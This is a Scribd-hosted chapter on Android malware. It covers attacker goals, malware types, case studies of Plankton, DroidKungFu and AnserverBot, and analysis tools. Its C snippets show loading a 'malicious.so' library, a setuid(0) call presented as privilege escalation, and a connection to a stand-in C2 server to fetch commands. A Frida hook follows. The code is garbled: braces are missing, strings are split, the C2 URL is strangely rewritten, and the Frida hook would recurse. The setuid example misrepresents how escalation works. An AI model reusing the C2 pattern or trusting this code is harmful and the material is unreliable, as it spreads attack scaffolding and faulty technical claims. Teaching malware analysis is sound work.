Scribd
Upload
88 views6 pages

Android Malware Chapter 6

Show more simple and easy to use the form of a good day sir

Uploaded by

jordanbelfort388
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Topics covered

  • malware behavior,
  • case studies,
  • Wireshark,
  • payloads,
  • trojanized apps,
  • dynamic analysis,
  • data theft,
  • SELinux,
  • dex2jar,
  • Google Play Protect
88 views6 pages

Android Malware Chapter 6

Show more simple and easy to use the form of a good day sir

Uploaded by

jordanbelfort388
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Topics covered

  • malware behavior,
  • case studies,
  • Wireshark,
  • payloads,
  • trojanized apps,
  • dynamic analysis,
  • data theft,
  • SELinux,
  • dex2jar,
  • Google Play Protect

Chapter 6: Android Malware

This chapter explores Android malware, including the techniques used by attackers,

various malware types, and tools for static and dynamic analysis.

We will cover notable case studies such as Plankton, DroidKungFu, and AnserverBot.

1. Overview of Android Malware

- Definition: Malware targeting Android devices to exploit vulnerabilities,

gain unauthorized access, steal data, or compromise security.

- Goals:

- Data theft (credentials, SMS messages, call logs, etc.)

- Remote control via command-and-control (C2) servers.

- Monetization through ad fraud or ransomware.

2. Android Malware Characteristics

- Permission Abuse: Requesting unnecessary permissions to access sensitive data.

- Stealth Mechanisms: Using obfuscation, encryption, and hiding in legitimate apps.

- Persistence: Reinstalls itself or adds itself to startup processes.

- Payloads: SMS spam, spyware, ransomware, or cryptocurrency miners.

3. Common Android Malware Types

- Trojanized Apps: Legitimate apps modified with malicious code.

- Spyware: Monitors user activity and transmits data.

- Ransomware: Encrypts files or locks devices, demanding payment for access.

- Adware: Generates revenue through fraudulent ad clicks.

4. Case Studies
Plankton

- Behavior: Injected into legitimate apps to avoid detection and spread through app stores.

- Communicates with remote servers for malicious updates.

Code Example: Dynamic Loading of Malicious Code

#include <jni.h>

#include <android/log.h>

#include <dlfcn.h>

#define LOG_TAG "Plankton_Malware"

#define LOG(...) __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, __VA_ARGS__)

void dynamic_load(const char *library) {

void *handle = dlopen(library, RTLD_LAZY);

if (!handle) {

LOG("Failed to load library: %s", dlerror());

return;

dlclose(handle);

JNIEXPORT void JNICALL Java_com_malware_Plankton_execute(JNIEnv *env, jobject obj) {

LOG("Loading malicious library...");

dynamic_load("/data/local/tmp/malicious.so");

}
DroidKungFu

- Behavior: Uses privilege escalation exploits to gain root access and hide malicious activities.

Code Example: Privilege Escalation

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

int main() {

setuid(0); // Attempt to gain root privileges

system("id > /data/local/tmp/root_check.txt");

printf("Privilege escalation attempt executed.

");

return 0;

AnserverBot

- Behavior: Advanced botnet targeting Android devices. Downloads and executes additional

payloads from remote servers.

Code Example: Command-and-Control Communication

#include <stdio.h>

#include <stdlib.h>

#include <string.h>
#include <curl/curl.h>

void connect_to_c2(const char *url) {

CURL *curl = curl_easy_init();

if (curl) {

curl_easy_setopt(curl, CURLOPT_URL, url);

curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);

curl_easy_perform(curl);

curl_easy_cleanup(curl);

int main() {

const char *c2_server = "http://malicious-server.com/command";

printf("Connecting to C2 server...

");

connect_to_c2(c2_server);

return 0;

5. Android Security Mechanisms

- Sandboxing: Apps run in isolated environments to prevent interference.

- Permissions: User must explicitly grant sensitive permissions.

- Google Play Protect: Built-in malware protection for Android devices.

- SELinux: Enforces access control policies at the kernel level.

6. Static and Dynamic Analysis of Android Malware

Static Analysis
- Analyze the APK file without executing it.

- Tools: APKTool, JD-GUI, MobSF, dex2jar.

- Extract and inspect the AndroidManifest.xml file for suspicious permissions.

Dynamic Analysis

- Execute the app in a controlled environment to observe runtime behavior.

- Tools: Frida, Burp Suite, Wireshark, Genymotion.

Dynamic Behavior Script (Frida):

Java.perform(function () {

var Activity = Java.use("android.app.Activity");

Activity.onResume.implementation = function () {

console.log("[*] App Resumed");

this.onResume();

};

var HttpURLConnection = Java.use("java.net.HttpURLConnection");

HttpURLConnection.getInputStream.implementation = function () {

console.log("[*] Intercepted HTTP connection: " + this.getURL());

return this.getInputStream();

};

});

7. Tools for Analysis

1. Static Analysis Tools:


- APKTool, JADX, MobSF, dex2jar.

2. Dynamic Analysis Tools:

- Frida, Burp Suite, Wireshark, Genymotion.

3. Additional Tools:

- Drozer, Androguard.

You might also like